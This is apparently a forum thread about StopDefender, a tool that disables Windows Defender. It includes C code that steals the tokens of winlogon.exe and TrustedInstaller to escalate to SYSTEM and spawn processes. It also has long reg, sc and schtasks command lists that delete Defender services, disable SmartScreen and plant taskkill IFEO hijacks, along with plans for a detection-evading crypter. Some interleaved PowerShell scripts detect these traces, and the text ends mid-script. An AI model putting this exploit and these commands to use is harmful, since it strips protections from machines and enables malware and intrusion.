Partially fixed stopping and unloading of more on-demand drivers, as in the header file:

Code:
#pragma once
#include <windows.h>
#include <iostream>
#include <string>
#include <tchar.h>
using namespace std;

#ifdef UNICODE
#define get_username get_usernameW
#else
#define get_username get_usernameA
#endif

// Defender services/drivers the tool tries to stop, in the order they are handled
#define DEF_SERVICES_COUNT 7
const PCTSTR DefenderServices[] = {
    TEXT("Sense"),
    TEXT("WdBoot"),
    TEXT("WdFilter"),
    TEXT("Wscsvc"),
    TEXT("WinDefend"),
    TEXT("WdNisSvc"),
    TEXT("WdNisDrv"),
};

wstring get_usernameW();
string get_usernameA();
BOOL StopDefenderService();
int GetProcessByName(PCTSTR name);

I've read in the RFC that these are all the services in Windows 11. There's no longer a need to click Start to stop Defender after a failed attempt: from the console, just invoke the program again, and from Windows, click the Stop button. I'll integrate all the files when I'm done. For now it's still a testing phase, with many interesting conclusions. I attach a fixed, useful, but still not final version. In summary, all you need to do is replace the StopDefender.exe file.
The code contained in cmdt.c has three functions that perform various actions related to Windows processes and services. Below is a general description of how each of them works:

Spoofing_System: This function attempts to impersonate system-level permissions. First, it tries to enable certain privileges ("SeDebugPrivilege" and "SeImpersonatePrivilege"), and then obtains the PID of the "winlogon.exe" process. It then opens this process, retrieves its token, duplicates it, and finally impersonates the logged-on user with this token. Such techniques are used in software exploits and malicious code, as impersonating system-level processes can give the code top-level privileges.

Start_TI_Service: This function attempts to start the "TrustedInstaller" service. It first opens the service control manager and then opens the "TrustedInstaller" service. Then it checks the current state of the service. If the service is stopped, it tries to start it. If the service is in a pending state, it waits for the current operation to finish. If the service is already running, it simply returns its PID. The function handles errors at each stage and returns the corresponding error codes.

PS_Create_As_TI: This function creates a new process using the "TrustedInstaller" service token. This allows the new process to run with the same permissions as the "TrustedInstaller" service. The function first enables the specified privileges and then opens the process with the specified PID (the PID of the "TrustedInstaller" service, which should be returned by the Start_TI_Service function). It then duplicates the process token and uses it to create a new process.

In general, this code performs operations that are used for privilege escalation: it tries to obtain higher-level privileges by impersonating system-level processes or the "TrustedInstaller" service. Improper use of such techniques can lead to security vulnerabilities or breaches. That's why ESET warns!
Code:
#include <windows.h>
#include <tlhelp32.h>
#include <string.h>
#include <stdio.h>

/* Set_Permission and Get_PID_by_Name are called by the posted code but were not
   included in the post; these two helpers are reconstructed here so the file compiles. */
static BOOL Set_Permission(const wchar_t* privilege)
{
    HANDLE hToken;
    if (!OpenProcessToken(GetCurrentProcess(),
                          TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
        return FALSE;
    }
    TOKEN_PRIVILEGES tp;
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    BOOL ok = LookupPrivilegeValueW(NULL, privilege, &tp.Privileges[0].Luid) &&
              AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL) &&
              GetLastError() == ERROR_SUCCESS; /* ERROR_NOT_ALL_ASSIGNED: privilege not held */
    CloseHandle(hToken);
    return ok;
}

static DWORD Get_PID_by_Name(const wchar_t* name)
{
    DWORD pid = 0;
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnap == INVALID_HANDLE_VALUE) {
        return 0;
    }
    PROCESSENTRY32W pe;
    pe.dwSize = sizeof(pe);
    if (Process32FirstW(hSnap, &pe)) {
        do {
            if (_wcsicmp(pe.szExeFile, name) == 0) {
                pid = pe.th32ProcessID;
                break;
            }
        } while (Process32NextW(hSnap, &pe));
    }
    CloseHandle(hSnap);
    return pid;
}

/* Impersonate SYSTEM on the calling thread by duplicating winlogon.exe's token.
   Returns 0 on success, otherwise a Win32 error code. (The post declared this
   void while still returning values, which does not compile.) */
DWORD Spoofing_System()
{
    Set_Permission(L"SeDebugPrivilege");
    Set_Permission(L"SeImpersonatePrivilege");

    DWORD systemPid = Get_PID_by_Name(L"winlogon.exe");
    if (systemPid == 0) {
        return ERROR_NOT_FOUND;
    }

    HANDLE hSystemProcess = OpenProcess(PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION,
                                        FALSE, systemPid);
    if (hSystemProcess == NULL) {
        return GetLastError();
    }

    HANDLE hSystemToken;
    if (!OpenProcessToken(hSystemProcess, MAXIMUM_ALLOWED, &hSystemToken)) {
        DWORD err = GetLastError();
        CloseHandle(hSystemProcess);
        return err;
    }
    CloseHandle(hSystemProcess);  /* the post leaked this handle */

    SECURITY_ATTRIBUTES tokenAttributes;
    tokenAttributes.nLength = sizeof(SECURITY_ATTRIBUTES);
    tokenAttributes.lpSecurityDescriptor = NULL;
    tokenAttributes.bInheritHandle = FALSE;

    HANDLE hDupToken;
    if (!DuplicateTokenEx(hSystemToken, MAXIMUM_ALLOWED, &tokenAttributes,
                          SecurityImpersonation, TokenImpersonation, &hDupToken)) {
        DWORD err = GetLastError();
        CloseHandle(hSystemToken);
        return err;
    }

    /* The impersonation stays on the thread after the token handles are closed. */
    DWORD err = 0;
    if (!ImpersonateLoggedOnUser(hDupToken)) {
        err = GetLastError();
    }
    CloseHandle(hDupToken);
    CloseHandle(hSystemToken);
    return err;
}

/* Start TrustedInstaller if needed and return the PID of TrustedInstaller.exe.
   Note: on failure this returns GetLastError(), so the caller cannot distinguish
   a PID from an error code; that is how the post wrote it and is kept here. */
DWORD Start_TI_Service()
{
    SC_HANDLE hSCManager = OpenSCManagerW(NULL, SERVICES_ACTIVE_DATABASE, GENERIC_EXECUTE);
    if (hSCManager == NULL) {
        return GetLastError();
    }

    SC_HANDLE hService = OpenServiceW(hSCManager, L"TrustedInstaller",
                                      GENERIC_READ | GENERIC_EXECUTE);
    if (hService == NULL) {
        DWORD err = GetLastError();
        CloseServiceHandle(hSCManager);
        return err;
    }

    SERVICE_STATUS_PROCESS statusBuffer;
    DWORD bytesNeeded;
    DWORD result;
    for (;;) {
        if (!QueryServiceStatusEx(hService, SC_STATUS_PROCESS_INFO, (LPBYTE)&statusBuffer,
                                  sizeof(SERVICE_STATUS_PROCESS), &bytesNeeded)) {
            result = GetLastError();
            break;
        }
        if (statusBuffer.dwCurrentState == SERVICE_STOPPED) {
            if (!StartServiceW(hService, 0, NULL)) {
                result = GetLastError();
                break;
            }
        }
        if (statusBuffer.dwCurrentState == SERVICE_START_PENDING ||
            statusBuffer.dwCurrentState == SERVICE_STOP_PENDING) {
            Sleep(statusBuffer.dwWaitHint);  /* wait for the pending transition */
            continue;
        }
        if (statusBuffer.dwCurrentState == SERVICE_RUNNING) {
            result = statusBuffer.dwProcessId;  /* TrustedInstaller.exe PID */
            break;
        }
        Sleep(100);  /* any other state: poll instead of spinning */
    }

    CloseServiceHandle(hService);
    CloseServiceHandle(hSCManager);
    return result;
}

/* Launch commandLine with a copy of TrustedInstaller's token.
   Returns 0 on success, otherwise a Win32 error code. commandLine must be a
   writable buffer because CreateProcessWithTokenW may modify it. */
DWORD PS_Create_As_TI(DWORD pid, wchar_t* commandLine)
{
    Set_Permission(L"SeDebugPrivilege");
    Set_Permission(L"SeImpersonatePrivilege");

    /* Become SYSTEM first; otherwise TrustedInstaller's token cannot be opened. */
    DWORD err = Spoofing_System();
    if (err != 0) {
        return err;
    }

    HANDLE hTIProcess = OpenProcess(PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION, FALSE, pid);
    if (hTIProcess == NULL) {
        err = GetLastError();
        RevertToSelf();
        return err;
    }

    HANDLE hTIToken;
    if (!OpenProcessToken(hTIProcess, MAXIMUM_ALLOWED, &hTIToken)) {
        err = GetLastError();
        CloseHandle(hTIProcess);
        RevertToSelf();
        return err;
    }
    CloseHandle(hTIProcess);

    SECURITY_ATTRIBUTES tokenAttributes;
    tokenAttributes.nLength = sizeof(SECURITY_ATTRIBUTES);
    tokenAttributes.lpSecurityDescriptor = NULL;
    tokenAttributes.bInheritHandle = FALSE;

    HANDLE hDupToken;
    if (!DuplicateTokenEx(hTIToken, MAXIMUM_ALLOWED, &tokenAttributes,
                          SecurityImpersonation, TokenImpersonation, &hDupToken)) {
        err = GetLastError();
        CloseHandle(hTIToken);
        RevertToSelf();
        return err;
    }

    STARTUPINFOW startupInfo;
    ZeroMemory(&startupInfo, sizeof(STARTUPINFOW));
    startupInfo.cb = sizeof(STARTUPINFOW);  /* not set in the post */
    startupInfo.lpDesktop = (LPWSTR)L"Winsta0\\Default";

    PROCESS_INFORMATION processInfo;
    ZeroMemory(&processInfo, sizeof(PROCESS_INFORMATION));

    if (!CreateProcessWithTokenW(hDupToken, LOGON_WITH_PROFILE, NULL, commandLine,
                                 CREATE_UNICODE_ENVIRONMENT, NULL, NULL,
                                 &startupInfo, &processInfo)) {
        err = GetLastError();
    } else {
        CloseHandle(processInfo.hThread);
        CloseHandle(processInfo.hProcess);
    }
    CloseHandle(hDupToken);
    CloseHandle(hTIToken);
    RevertToSelf();  /* drop the SYSTEM impersonation taken in Spoofing_System */
    return err;
}

/* Minimal driver: start TrustedInstaller and spawn the given command line as it. */
int wmain(int argc, wchar_t* argv[])
{
    DWORD tiPid = Start_TI_Service();
    if (tiPid == 0) {
        wprintf(L"TrustedInstaller is not running\n");
        return 1;
    }
    wchar_t defaultCmd[] = L"cmd.exe";
    DWORD err = PS_Create_As_TI(tiPid, argc > 1 ? argv[1] : defaultCmd);
    if (err != 0) {
        wprintf(L"PS_Create_As_TI failed: %lu\n", err);
        return 1;
    }
    return 0;
}
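From the defender's side, the handle opens in the code above are its most visible footprint: Spoofing_System() opens winlogon.exe and PS_Create_As_TI() opens TrustedInstaller.exe, both with PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION (0x0040 | 0x0400 = 0x440). The following script is an added example, not code from the post or from the StopDefender project: it flags Sysmon Event ID 10 (ProcessAccess) records that match that pattern. It assumes Sysmon is installed with a ProcessAccess rule that covers these target images, and it runs against constructed sample records unless started with -Live.

```powershell
# Added example (not from the post): hunt for the token-theft handle opens that
# Spoofing_System()/PS_Create_As_TI() perform. Sysmon Event ID 10 logs the
# requested access mask as GrantedAccess (e.g. "0x440"), assuming the Sysmon
# config has a ProcessAccess rule for winlogon.exe / TrustedInstaller.exe / lsass.exe.

$TargetNames = @('winlogon.exe', 'TrustedInstaller.exe', 'lsass.exe')
$PROCESS_DUP_HANDLE        = 0x0040
$PROCESS_QUERY_INFORMATION = 0x0400

function Test-TokenTheftAccess {
    # $Record keys: SourceImage, TargetImage, GrantedAccess (hex string as Sysmon writes it)
    param([Parameter(Mandatory)] [hashtable] $Record)
    $mask      = [Convert]::ToInt32($Record.GrantedAccess, 16)
    $target    = [System.IO.Path]::GetFileName($Record.TargetImage)
    $targetHit = $TargetNames -contains $target
    $rightsHit = (($mask -band $PROCESS_DUP_HANDLE) -ne 0) -and
                 (($mask -band $PROCESS_QUERY_INFORMATION) -ne 0)
    # OS components that routinely open these processes; tune this list per environment
    $noisySource = $Record.SourceImage -match '\\(csrss|services|svchost|lsass|MsMpEng|wininit)\.exe$'
    return [bool]($targetHit -and $rightsHit -and -not $noisySource)
}

function Get-SysmonProcessAccess {
    # Live query of the Sysmon log; needs Sysmon and an elevated shell.
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 10 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents 5000 -ErrorAction SilentlyContinue | ForEach-Object {
        $xml = [xml]$_.ToXml()
        $rec = @{ TimeCreated = $_.TimeCreated }
        foreach ($d in $xml.Event.EventData.Data) { $rec[$d.Name] = $d.'#text' }
        $rec
    }
}

# Constructed sample records standing in for the live log (not real telemetry).
# The first two mimic StopDefender.exe; the last two are ordinary noise.
$SampleRecords = @(
    @{ SourceImage = 'C:\Tools\StopDefender.exe';       TargetImage = 'C:\Windows\System32\winlogon.exe';          GrantedAccess = '0x440'  },
    @{ SourceImage = 'C:\Tools\StopDefender.exe';       TargetImage = 'C:\Windows\servicing\TrustedInstaller.exe'; GrantedAccess = '0x440'  },
    @{ SourceImage = 'C:\Windows\System32\svchost.exe'; TargetImage = 'C:\Windows\System32\winlogon.exe';          GrantedAccess = '0x1000' },
    @{ SourceImage = 'C:\Windows\System32\Taskmgr.exe'; TargetImage = 'C:\Windows\System32\notepad.exe';           GrantedAccess = '0x1410' }
)

$records = if ($args -contains '-Live') { Get-SysmonProcessAccess } else { $SampleRecords }
$records | Where-Object { Test-TokenTheftAccess $_ } | ForEach-Object {
    '{0} opened {1} with {2}' -f $_.SourceImage, $_.TargetImage, $_.GrantedAccess
}
```

The mask test is deliberately a subset check rather than an equality check: MAXIMUM_ALLOWED or a larger request still contains both bits. If "Audit Token Right Adjusted" is enabled, the Set_Permission() calls also surface as Security event 4703 enabling SeDebugPrivilege, which pairs well with this query.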
I will try it soon. I'm hating Windows Defender on Win 10 putting some of my files in quarantine, just to name one, NirSoft ProduKey. Just a question, if I understand correctly: if I disable/stop the service on a PC (HDD), will it be disabled forever until I re-enable/start it? Even if I put the same HDD in another PC?
Removing Defender has been described dozens of times. Simply delete the Defender folder, and in the autorun entries delete the links that no longer work.

Spoiler: REMOVING WINDOWS DEFENDER
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
reg add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v DontReportInfectionInformation /t REG_DWORD /d 1 /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d 1 /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SecHealthUI.exe" /v Debugger /t REG_SZ /d "%windir%\System32\taskkill.exe" /f
install_wim_tweak /o /c Windows-Defender /r
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d 0 /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f

Spoiler: REMOVING TELEMETRY
sc delete DiagTrack
sc delete dmwappushservice
sc delete WerSvc
sc delete OneSyncSvc
sc delete MessagingService
sc delete wercplsupport
sc delete PcaSvc
sc config wlidsvc start=demand
sc delete wisvc
sc delete RetailDemo
sc delete diagsvc
sc delete shpamsvc
sc delete TermService
sc delete UmRdpService
sc delete SessionEnv
sc delete TroubleshootingSvc
for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "wscsvc" ^| find /i "wscsvc"') do (reg delete %I /f)
for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "OneSyncSvc" ^| find /i "OneSyncSvc"') do (reg delete %I /f)
for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "MessagingService" ^| find /i "MessagingService"') do (reg delete %I /f)
for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "PimIndexMaintenanceSvc" ^| find /i "PimIndexMaintenanceSvc"') do (reg delete %I /f)
for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "UserDataSvc" ^| find /i "UserDataSvc"') do (reg delete %I /f)
for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "UnistoreSvc" ^| find /i "UnistoreSvc"') do (reg delete %I /f)
for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "BcastDVRUserService" ^| find /i "BcastDVRUserService"') do (reg delete %I /f)
for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "Sgrmbroker" ^| find /i "Sgrmbroker"') do (reg delete %I /f)
sc delete diagnosticshub.standardcollector.service
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Siuf\Rules" /v "NumberOfSIUFInPeriod" /t REG_DWORD /d 0 /f
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Siuf\Rules" /v "PeriodInNanoSeconds" /f
reg add "HKLM\SYSTEM\ControlSet001\Control\WMI\AutoLogger\AutoLogger-Diagtrack-Listener" /v Start /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v AITEnable /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v DisableInventory /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v DisablePCA /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v DisableUAR /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRecentDocsHistory" /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CompatTelRunner.exe" /v Debugger /t REG_SZ /d "%windir%\System32\taskkill.exe" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DeviceCensus.exe" /v Debugger /t REG_SZ /d "%windir%\System32\taskkill.exe" /f

Spoiler: SCHEDULED TASKS
schtasks /Change /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /disable
schtasks /Change /TN "Microsoft\Windows\Application Experience\AitAgent" /disable
schtasks /Change /TN "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /disable
schtasks /Change /TN "Microsoft\Windows\Application Experience\ProgramDataUpdater" /disable
schtasks /Change /TN "Microsoft\Windows\Application Experience\StartupAppTask" /disable
schtasks /Change /TN "Microsoft\Windows\Autochk\Proxy" /disable
schtasks /Change /TN "Microsoft\Windows\CloudExperienceHost\CreateObjectTask" /disable
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\BthSQM" /disable
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /disable
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask" /disable
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" /disable
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" /disable
schtasks /Change /TN "Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" /disable
schtasks /Change /TN "Microsoft\Windows\DiskFootprint\Diagnostics" /disable
schtasks /Change /TN "Microsoft\Windows\FileHistory\File History (maintenance mode)" /disable
schtasks /Change /TN "Microsoft\Windows\Maintenance\WinSAT" /disable
schtasks /Change /TN "Microsoft\Windows\PI\Sqm-Tasks" /disable
schtasks /Change /TN "Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem" /disable
schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyMonitor" /disable
schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyRefresh" /disable
schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyUpload" /disable
schtasks /Change /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" /disable
schtasks /Change /TN "Microsoft\Windows\WindowsUpdate\Automatic App Update" /disable
schtasks /Change /TN "Microsoft\Windows\License Manager\TempSignedLicenseExchange" /disable
schtasks /Change /TN "Microsoft\Windows\Clip\License Validation" /disable
schtasks /Change /TN "\Microsoft\Windows\ApplicationData\DsSvcCleanup" /disable
schtasks /Change /TN "\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem" /disable
schtasks /Change /TN "\Microsoft\Windows\PushToInstall\LoginCheck" /disable
schtasks /Change /TN "\Microsoft\Windows\PushToInstall\Registration" /disable
schtasks /Change /TN "\Microsoft\Windows\Shell\FamilySafetyMonitor" /disable
schtasks /Change /TN "\Microsoft\Windows\Shell\FamilySafetyMonitorToastTask" /disable
schtasks /Change /TN "\Microsoft\Windows\Shell\FamilySafetyRefreshTask" /disable
schtasks /Change /TN "\Microsoft\Windows\Subscription\EnableLicenseAcquisition" /disable
schtasks /Change /TN "\Microsoft\Windows\Subscription\LicenseAcquisition" /disable
schtasks /Change /TN "\Microsoft\Windows\Diagnosis\RecommendedTroubleshootingScanner" /disable
schtasks /Change /TN "\Microsoft\Windows\Diagnosis\Scheduled" /disable
schtasks /Change /TN "\Microsoft\Windows\NetTrace\GatherNetworkInfo" /disable
del /F /Q "C:\Windows\System32\Tasks\Microsoft\Windows\SettingSync\*"
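Every command in the spoilers above leaves a durable, easily checked trace. The script below is an added example, not part of the post: it audits a machine for the state those commands produce, using only the paths, value names and task names that appear in them. It needs an elevated PowerShell session on the machine being checked; the short list of services and tasks it probes is a representative subset, not the whole script.

```powershell
# Added example (not from the post): audit for the settings left behind by the
# "REMOVING WINDOWS DEFENDER" / "REMOVING TELEMETRY" / "SCHEDULED TASKS" commands.
# Run elevated. Every path, value and task name below is taken from those commands.

function Get-RegValue([string]$Path, [string]$Name) {
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

function Test-DefenderRemovalTweaks {
    $findings = New-Object System.Collections.Generic.List[string]

    # 1. Policy values the script writes (value present AND equal to what the script sets)
    $valueChecks = @(
        @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender';        Name = 'DisableAntiSpyware';    Bad = 1 },
        @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet'; Name = 'SpyNetReporting';       Bad = 0 },
        @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet'; Name = 'SubmitSamplesConsent';  Bad = 2 },
        @{ Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer';  Name = 'SmartScreenEnabled';    Bad = 'Off' },
        @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System';          Name = 'EnableSmartScreen';     Bad = 0 },
        @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\MRT';                     Name = 'DontOfferThroughWUAU';  Bad = 1 },
        @{ Path = 'HKLM:\SYSTEM\ControlSet001\Control\WMI\AutoLogger\AutoLogger-Diagtrack-Listener'; Name = 'Start'; Bad = 0 }
    )
    foreach ($c in $valueChecks) {
        $v = Get-RegValue $c.Path $c.Name
        if ($null -ne $v -and "$v" -eq "$($c.Bad)") {
            $findings.Add("value set: $($c.Path)\$($c.Name) = $v")
        }
    }

    # 2. Image File Execution Options "Debugger" entries that point at taskkill.exe.
    #    The script plants these for SecHealthUI.exe, CompatTelRunner.exe and DeviceCensus.exe,
    #    so any process with that name is killed as soon as it starts. Check every IFEO key,
    #    not just those three, since the same trick works for any image name.
    $ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
    Get-ChildItem -Path $ifeo -ErrorAction SilentlyContinue | ForEach-Object {
        $dbg = Get-RegValue $_.PSPath 'Debugger'
        if ($dbg -and $dbg -match 'taskkill') {
            $findings.Add("IFEO debugger hijack: $($_.PSChildName) -> $dbg")
        }
    }

    # 3. Service registry keys the script deletes outright (a missing key means the
    #    service is gone, not merely disabled)
    foreach ($svc in 'Sense', 'SecurityHealthService', 'wscsvc', 'DiagTrack', 'WerSvc', 'TermService') {
        if (-not (Test-Path "HKLM:\SYSTEM\CurrentControlSet\Services\$svc")) {
            $findings.Add("service key missing: $svc")
        }
    }

    # 4. A few of the scheduled tasks the script disables
    $tasks = @(
        @{ Path = '\Microsoft\Windows\Application Experience\';                 Name = 'Microsoft Compatibility Appraiser' },
        @{ Path = '\Microsoft\Windows\Customer Experience Improvement Program\'; Name = 'Consolidator' },
        @{ Path = '\Microsoft\Windows\Windows Error Reporting\';                Name = 'QueueReporting' }
    )
    foreach ($t in $tasks) {
        $task = Get-ScheduledTask -TaskPath $t.Path -TaskName $t.Name -ErrorAction SilentlyContinue
        if ($null -eq $task) {
            $findings.Add("task missing: $($t.Path)$($t.Name)")
        } elseif ($task.State -eq 'Disabled') {
            $findings.Add("task disabled: $($t.Path)$($t.Name)")
        }
    }

    return $findings
}

$result = @(Test-DefenderRemovalTweaks)
if ($result.Count -eq 0) { 'no removal tweaks found' } else { $result }
```

The IFEO check is the one worth keeping even if the rest is dropped: a Debugger value that names taskkill.exe is not something Windows or a legitimate installer writes, so it is a high-confidence indicator with essentially no false positives.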
I don't know if you all read the article. I tested DefCon and nothing has changed. Tamper Protection must be turned off. In my case it doesn't have to be, because why should it? I could add an option to make the program work in service mode and permanently disable Defender. However, this was not the concept. From the beginning I created two versions, where the console version is the most important, because it allows, despite numerous restrictions, someone with administrator rights on a remote machine in the network to disable Defender (and more). A convenience for administrators of server versions, etc. This program is actually a local exploit that impersonates trusted Microsoft services/processes. I know more or less how the next systems will turn out. If the Tamper Protection option becomes impossible to change with the Secure Boot flag, you have a problem. And I'm working on a decent installer that bypasses first-run protection and exception creation. If I succeed, I will put it up. The disabling option is a much-discussed topic, and there is no need to start another thread on it. The option to stop this type of service is another tale. Those who are well acquainted with psexec from the PsTools stable know what powers this program has.
Released version 1.03. Added automatic exception insertion into trusted programs, regardless of file name and location. Passes the Tamper Protection test; nothing needs to be changed. Version 1.04 will get a non-standard PE crypter to make the program as undetectable as possible. For the x64 version, the program is downloaded from the x64 folder. Best regards, Marek. P.S. Multilingual installer on YT. P.S. 2: If one starts with user rights, the new GUI (StopDefenderGui.zip) will ask for an administrator; otherwise restarting the service would not be possible.
I am still not able to understand: if I open cmd with NSudo[*] and try to execute a command like "kill service WinDefend" and so on, it will fail. What did you do to make it succeed? [*] NSudoLC.exe -U:T -P:E
Stopping or modifying Windows Defender requires system-level permissions, which are reserved for the TrustedInstaller account. But in Windows 10/11, if you impersonate TrustedInstaller, you still have to push through other security layers that prevent such actions. Mandatory Integrity Control (MIC) is one such layer: it pigeonholes objects (such as files or processes) into different integrity levels (low, medium, high, system), thus limiting interactions between them. Discretionary Access Control (DAC) is another security layer, which allows the owner of an object to decide who has access to it. This control is more granular and allows you to specify precisely which user accounts and groups have access to specific objects and what operations they can perform on them. In Windows 11, Microsoft also used techniques such as Control Flow Guard (CFG), which prevents attacks that modify a program's control flow, and Device Guard, which restricts the system to running only trusted software. Writing such an exploit for this system gets heavily complicated and is difficult to pull off; just impersonating TrustedInstaller is not enough.

The code I've shown is an example of how to get the privileges of a Windows user who has the ability to stop the Windows Defender service. The program does this by manipulating process security tokens. The main steps of this code are:

1. Using the ImpersonateProcessTokenByName() function to find and impersonate the winlogon.exe system process, which has high privileges; ImpersonateLoggedOnUser() allows the current thread to operate from the winlogon.exe perspective.
2. Calling ImpersonateProcessTokenByName() again, but this time to impersonate the lsass.exe process. lsass.exe is the system process responsible for system security, including user authorization and authentication.
3. Using the CreateTokenWinDefend() function to create a new token that authenticates the process as having the privileges of the "WinDefend" and "TrustedInstaller" services. This is crucial, because these services have permission to stop the Windows Defender service.
4. Impersonating with the token created in the previous step via ImpersonateLoggedOnUser(). At this point, the current process is running from the perspective of the "WinDefend" and "TrustedInstaller" services.
5. Stopping the Windows Defender service with the StopDefenderService() function. This is possible thanks to the permissions the program acquired in the previous steps.

Now I think everything is clear.
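The reason step 3 above needs a token carrying the WinDefend and TrustedInstaller service SIDs, rather than plain Administrator or SYSTEM, is the service object's own DACL: SERVICE_STOP (WP in SDDL) on WinDefend is not granted to administrators. The script below is an added example, not part of this thread or the StopDefender tool: it reads the security descriptor of each service in the DefenderServices list from the header file posted earlier, decodes which trustees hold SERVICE_STOP, and prints the Tamper Protection state. It assumes it is run on Windows with sc.exe available; the SDDL rights abbreviations are the ones the Service Control Manager documents for service objects.

```powershell
# Added example (not from the thread): show who is actually allowed to stop each
# Defender service by decoding the DACL that "sc.exe sdshow" prints, then report
# Tamper Protection. Service names are the DefenderServices list from the header file.

$DefenderServices = 'Sense', 'WdBoot', 'WdFilter', 'wscsvc', 'WinDefend', 'WdNisSvc', 'WdNisDrv'

# SDDL access-right tokens as the SCM interprets them for service objects
$ServiceRights = @{
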